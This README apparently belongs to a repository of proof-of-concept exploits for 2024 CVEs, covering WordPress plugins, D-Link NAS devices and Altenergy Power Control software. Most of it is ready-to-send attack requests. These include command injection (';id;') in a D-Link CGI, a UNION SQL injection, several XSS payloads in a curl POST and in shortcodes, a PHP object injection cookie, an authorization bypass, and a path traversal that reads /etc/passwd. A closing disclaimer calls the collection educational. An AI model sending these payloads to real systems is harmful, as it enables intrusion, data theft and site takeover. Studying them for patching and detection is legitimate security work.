CVE Exploits and PoC Collection
This repository contains proof-of-concept (PoC) exploits for several WordPress plugins and other servers/websites with known vulnerabilities. These examples are for educational and research purposes only. Use responsibly.
⚠️ Vulnerabilities
✅ CVE-2024-10914
A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
✅ CVE-2024-11305
A vulnerability classified as critical was found in Altenergy Power Control Software up to 20241108
POST /index.php/display/status_zigbee HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)CHAR(113,118,98,98,113),11-- wPIB
✅ CVE-2024-10793
WP Security Audit Log Plugin Detection An XSS vulnerability that allows injecting malicious scripts.
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
-d 'action=destroy-sessions&user_id=<script>alert("XSS found windz3r0day")</script>'
✅ CVE-2024-11199
Stored Cross-Site Scripting via the plugin's rescue_progressbar
shortcode
[rescue_progressbar visibility='foo" onclick="alert(/XSS/)"']
✅ CVE-2024-11381
Stored Cross-Site Scripting via the plugin's ch_registro
shortcode
[ch_registro note='"onmouseover="alert(/XSS/)"']
✅ CVE-2024-43919
YARPP <= 5.30.10 - Missing Authorization This exploit allows unauthorized access to modify display types.
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
✅ CVE-2024-52433
My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection
GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
✅ CVE-2024-9935
PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i
▶▶▶ Disclaimer
This repository is intended for educational purposes only. Use of these exploits on systems or websites without explicit permission is illegal and unethical. The creator is not responsible for any misuse of this information.
Support Me
If you find this work helpful, you can support me:
Thanks for your support! ❤️
Last updated